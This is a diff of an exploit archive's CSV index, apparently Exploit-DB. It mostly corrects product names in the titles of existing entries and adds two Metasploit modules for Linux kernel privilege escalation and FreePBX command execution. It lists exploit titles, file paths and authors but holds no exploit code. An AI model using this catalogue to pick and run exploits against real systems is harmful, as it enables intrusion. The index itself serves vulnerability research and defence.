Traversal",2011-02-28,clshack,windows,remote,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 @@ -14197,7 +14197,7 @@ id,file,description,date,author,platform,type,port 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 -16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 +16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14231,6 +14231,7 @@ id,file,description,date,author,platform,type,port 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 +40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14584,7 +14585,7 @@ id,file,description,date,author,platform,type,port 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0 -16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 +16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881 @@ -15091,7 +15092,7 @@ id,file,description,date,author,platform,type,port 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 -17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0 +17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 @@ -15118,7 +15119,7 @@ id,file,description,date,author,platform,type,port 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0 -17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 +17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 @@ -15223,7 +15224,7 @@ id,file,description,date,author,platform,type,port 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 -39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 +39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 @@ -15239,7 +15240,7 @@ id,file,description,date,author,platform,type,port 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Joomla! Component Xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0 -17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 +17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"Joomla! Component SOBI2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0 @@ -15337,7 +15338,7 @@ id,file,description,date,author,platform,type,port 17646,platforms/php/webapps/17646.txt,"Joomla! Component TNR Enhanced Joomla! Search - SQL Injection",2011-08-09,NoGe,php,webapps,0 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0 -17649,platforms/windows/remote/17649.py,"BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0 +17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)",2011-08-10,Metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local,0 @@ -15372,7 +15373,7 @@ id,file,description,date,author,platform,type,port 17688,platforms/php/webapps/17688.txt,"WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17689,platforms/php/webapps/17689.txt,"WordPress Plugin Menu Creator 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,multiple,remote,0 -17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0 +17692,platforms/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Persistent Cross-Site Scripting",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache - Remote Denial of Service (Memory Exhaustion)",2011-08-19,kingcope,multiple,dos,0 @@ -15476,7 +15477,7 @@ id,file,description,date,author,platform,type,port 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",php,webapps,0 17808,platforms/php/webapps/17808.txt,"WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 17809,platforms/php/webapps/17809.txt,"WordPress Plugin A to Z Category Listing 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 -17810,platforms/windows/remote/17810.rb,"BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 +17810,platforms/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17814,platforms/php/webapps/17814.txt,"WordPress Plugin Event Registration 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 @@ -15536,7 +15537,7 @@ id,file,description,date,author,platform,type,port 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 -17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 +17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local,0 17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 @@ -15672,7 +15673,7 @@ id,file,description,date,author,platform,type,port 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local,0 -18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0 +18028,platforms/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0 @@ -15788,7 +15789,7 @@ id,file,description,date,author,platform,type,port 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 -18182,platforms/windows/remote/18182.txt,"Serv-U FTP - Jail Break",2011-12-01,kingcope,windows,remote,0 +18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 @@ -16013,11 +16014,11 @@ id,file,description,date,author,platform,type,port 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps,0 -18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 +18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0 -18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD",2012-02-09,shinnai,windows,dos,0 +18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD Exploit",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 @@ -16208,7 +16209,7 @@ id,file,description,date,author,platform,type,port 18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0 -18718,platforms/windows/remote/18718.txt,"distinct tftp server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 +18718,platforms/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0 @@ -16308,7 +16309,7 @@ id,file,description,date,author,platform,type,port 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 -18836,platforms/php/remote/18836.py,"PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0 +18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0 18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall - Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 @@ -16443,7 +16444,7 @@ id,file,description,date,author,platform,type,port 19022,platforms/php/webapps/19022.txt,"WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19023,platforms/php/webapps/19023.php,"WordPress Plugin wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps,0 -19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - DEBUG",1988-08-01,anonymous,linux,remote,0 +19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 @@ -16452,15 +16453,15 @@ id,file,description,date,author,platform,type,port 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload (Metasploit)",2012-06-10,Metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 -19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0 -19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0 -19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 -19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0 +19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0 +19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit",1991-05-01,anonymous,aix,dos,0 +19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit",1999-11-23,anonymous,solaris,dos,0 +19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall Exploit",1999-11-12,anonymous,aix,dos,0 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 -19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 +19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 -19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0 +19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 19050,platforms/php/webapps/19050.txt,"WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 @@ -16473,8 +16474,8 @@ id,file,description,date,author,platform,type,port 19058,platforms/php/webapps/19058.txt,"WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 -19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 -19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0 +19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit",1996-04-05,"Arthur Hagen",irix,local,0 +19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit",1996-11-22,"Yuri Volobuev",irix,local,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - ipchange.php Command Injection (Metasploit)",2012-06-12,Metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 @@ -16511,6 +16512,7 @@ id,file,description,date,author,platform,type,port 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 +40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0 19106,platforms/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Exploit",1996-07-03,"Jeff Uphoff",linux,local,0 @@ -16530,7 +16532,7 @@ id,file,description,date,author,platform,type,port 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0 -19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0 +19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink Exploit",1998-07-15,emffmmadffsdf,linux,remote,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 